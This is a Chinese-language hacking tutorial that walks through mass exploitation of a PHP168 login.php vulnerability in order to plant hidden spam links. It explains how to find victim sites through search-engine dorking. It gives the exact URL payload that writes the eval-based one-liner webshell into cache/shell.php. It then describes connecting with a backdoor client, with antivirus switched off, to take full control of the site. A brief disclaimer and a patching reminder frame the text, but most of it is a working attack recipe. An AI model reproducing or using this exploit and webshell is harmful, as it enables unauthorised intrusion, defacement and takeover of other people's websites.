”一切为了暗链，php168 oday 利用过程

这几天PHP168漏洞传疯了！最近，著名的网站系统PHP168曝出有史以来最高危的漏洞，黑客可以绕开所有网站用户验证，直接将木马写入到网站中，从而控制整个网站，而整个过程却只需要一分钟。
具体的暗链代码请参考上一篇文章：一切为了暗链，菜鸟跟我一起来ASP手工注入
提醒：请不要为了一时的快活而去吃免费窝窝头！入侵是非法的！

1、寻找入侵目标

我们在百度中以“powered by php168”为关键字进行搜索，可以找到大约125000篇的相关内容，可见使用PHP168系统搭建的网站是非常多的。目标众多，对于小菜来说，这是一个搜集肉鸡的绝佳机会，一个小时收集到数十台肉鸡并不是难事。

写入一句话木马

由于漏洞是因为login.php文件对于变量过滤不严所造成的，因此我们无需想方设法的去破解密码，而只需将黑客获取网站webshell的利器“一句话木马”写入到网站中就可以了。

首先任意打开一个搜索结果，在其域名后加上这样一段代码：login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>。这段代码的意思利用login.php文件将<?php%20@eval($_POST[cmd]);?>这段代码写入到网站缓存目录cache的shell.php文件中。“<?php%20@eval($_POST[cmd]);?>”就是一句话木马的服务端。

图1.写入木马成功后会出现登录界面

如果执行成功，将会打开网站用户的登录界面。如果执行不成功，将会出现“无法打开网页”或者“404-网页找不到”的相关提示，这时我们就只能另选一个网站进行测试了。

用一句话木马客户端进行连接

我们已经将“一句话木马”的服务端写入到了网站中，相当于拿到了打开网站大门的钥匙，接下来我们只要用“一句话木马”的客户端进行连接就可以了。

下载“lanker一句话PHP后门客户端3.0”（黑客软件，会被杀毒软件查杀，下载使用前请先关闭杀毒软件的文件监控功能），运行其中的“lanker一句话PHP后门客户端3.0.htm”文件，打开木马客户端的界面后，我们在“后门地址中”中输入：http://www.te58.com/web/cache/shell.php，其中www.te58.com是网站的域名，/web是PHP168网站程序所在的目录，大家在测试时要根据自己的情况做相应的修改再输入。

图2.连接上服务端

填写完毕后，我们就可以来连接潜伏在网站中的服务端了。在“基本功能列表”下拉框中选择“PHP环境变量”功能，点击“提交”按钮，不出意外的话你将看到当前服务器的PHP配置信息。可见我们已经连接上了网站中的服务端文件，并且拿到了一个webshell。接下来我们可以用“一句话木马”修改、删除网站中的任意文件，也可以通过“上传文件”功能上传一个管理功能更为强大的PHP木马程序，完全控制网站。

图3.用PHP木马控制网站

通过PHP168的这个漏洞，一分钟变足以入侵一个网站，希望广大使用PHP168建站的站长朋友能及时打好补丁，防止黑客入侵。